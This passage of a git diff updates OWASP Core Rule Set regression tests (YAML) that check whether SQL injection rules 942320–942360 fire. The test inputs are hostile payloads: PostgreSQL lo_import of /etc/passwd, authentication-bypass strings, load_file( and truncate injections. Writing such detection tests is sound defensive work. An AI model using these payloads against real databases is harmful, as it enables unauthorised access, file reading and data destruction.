"/index.php?id=password::int" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-6 + desc: "Detects PostgreSQL data conversion with ::bool" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-7 + desc: "Detects PostgreSQL bypass attempt with div(23,-2) - issue #2910" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=div(23,-2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-8 + desc: "Detects PostgreSQL bypass attempt with div (23.23 , 2) - issue #2910" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=div+(23.23+,+2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-9 + desc: "Detects PostgreSQL bypass attempt lo_import'( - issue #2912" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-10 + desc: "Detects PostgreSQL bypass attempt with lo_get(16400) - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=lo_get(16400)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-11 + desc: "Detects PostgreSQL bypass attempt function(foo)::text - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=function(foo)::text" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-12 + desc: "Detects PostgreSQL bypass attempt function(foo)::bigint - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=function(foo)::bigint" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-13 + desc: "Detects PostgreSQL bypass attempt function(foo)::double precision - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=function(foo)::double%20precision" + version: HTTP/1.0 + output: + log_contains: id "942320" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml new file mode 100644 index 0000000000..ae9973e959 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml @@ -0,0 +1,37 @@ +--- +meta: + author: "Franziska Bühler" + enabled: true + name: 942321.yaml +tests: + - test_title: 942321-1 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16200),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942321" + - test_title: 942321-2 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: overlay(password placing $$$$ from 1)::int and id=1 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942321" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml index 7b3e68b7f9..6e72d50fe7 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml @@ -1,23 +1,89 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942330.yaml - tests: - - - test_title: 942330-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942330.yaml +tests: + - test_title: 942330-1 desc: "classic SQL injection probings 1/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=%22%27&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942330" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%22%27&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-2 + desc: "Test first backslash match ([\"'`\x5c]*?)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\\\"1 or 1-" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-3 + desc: "Test second backslash match (\x5cx(?:23|27|3d))" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\\x23" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-4 + desc: "Test false positive issue nr. 3205" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: | + "var=05111222333 + andy.surname@somedomain.com" + version: HTTP/1.0 + output: + no_log_contains: id "942330" + - test_title: 942330-5 + desc: "Test false positive issue nr. 3205" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=05111222333 andy.surname@somedomain.com" + version: HTTP/1.0 + output: + no_log_contains: id "942330" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml index 46731b271d..18ca873cbe 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml @@ -1,24 +1,191 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942340.yaml - tests: - - - test_title: 942340-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942340.yaml +tests: + - test_title: 942340-1 desc: "basic SQL authentication bypass attempts 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - # in ( select * from - uri: "/?var=in%20%28%20select%20%2a%20from" - version: HTTP/1.0 - output: - log_contains: id "942340" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # in ( select * from + uri: "/?var=in%20%28%20select%20%2a%20from" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-2 + desc: "SQLite authentication bypass with except select" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except \tselect.1,2 + uri: "/?var=except%20%09select.1%2C2" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-3 + desc: "SQLite authentication bypass with except values" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except values (1,2) + uri: "/?var=except%20values(1%2C2)" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-4 + desc: "true-negative except selecting" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except selecting + uri: "/?var=except%20selecting" + version: HTTP/1.0 + output: + no_log_contains: id "942340" + - test_title: 942340-5 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20array[id]%20is%20not%20null--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-6 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20email~all(array[email]);analyze--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-7 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='%20and%20email%20not%20similar%20to%20id--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-8 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='%20or%20true;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='%20or%20false;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-9 + desc: "basic SQL authentication bypass attempts 3/3 (no whitespace between operator)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='||true" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-10 + desc: "SQL Auth Bypass FP test (invalid operator without whitespace)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='ortrue" + version: HTTP/1.0 + output: + no_log_contains: id "942340" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml index 0c8567c0c9..c9c7804067 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml @@ -1,41 +1,74 @@ --- - meta: - author: "Christian S.J. Peron, Franziska Bühler" - description: None - enabled: true - name: 942350.yaml - tests: - - - test_title: 942350-1 +meta: + author: "Christian S.J. Peron, Franziska Bühler" + description: None + enabled: true + name: 942350.yaml +tests: + - test_title: 942350-1 desc: "MySQL UDF injection and other data/structure manipulation" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - # ; insert INTO table (word) VALUES('dfsd') - uri: "/?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" - version: HTTP/1.0 - output: - log_contains: id "942350" - - - test_title: 942350-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ; insert INTO table (word) VALUES('dfsd') + uri: "/?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_title: 942350-2 desc: "Fix for FP reported in GitHub issue 1587" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - # ;insertion_424242 - uri: "/?var=%3Binsertion_424242" - version: HTTP/1.0 - output: - no_log_contains: id "942350" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ;insertion_424242 + uri: "/?var=%3Binsertion_424242" + version: HTTP/1.0 + output: + no_log_contains: id "942350" + - test_title: 942350-3 + desc: "MySQL create function injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); + uri: "/?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_title: 942350-4 + desc: "Status Page Test - MySQL injection with ;truncate[xx" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=;truncate[xx" + version: HTTP/1.0 + output: + log_contains: id "942350" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml index 21d20c4f02..138c90027d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml @@ -1,557 +1,670 @@ --- - meta: - author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" - description: None - enabled: true - name: 942360.yaml - tests: - - - test_title: 942360-1 +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" + description: None + enabled: true + name: 942360.yaml +tests: + - test_title: 942360-1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") as cc FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS orders FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-8 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS `carrier_id` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS Role FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS val FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-13 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-14 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS 'Durchschnitt_Importzeit' FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-15 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-16 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") as col_0_0_ from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-17 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS `count` FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-18 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-19 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") as User from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-20 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS t FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-21 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-22 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") as ExecuteTheseSQLCommands FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-23 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-24 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-25 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "! As' from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-26 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "; As not from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-27 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-28 - desc: "Detects concatenated basic SQL injection and SQLLFI attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - - test_title: 942360-29 - 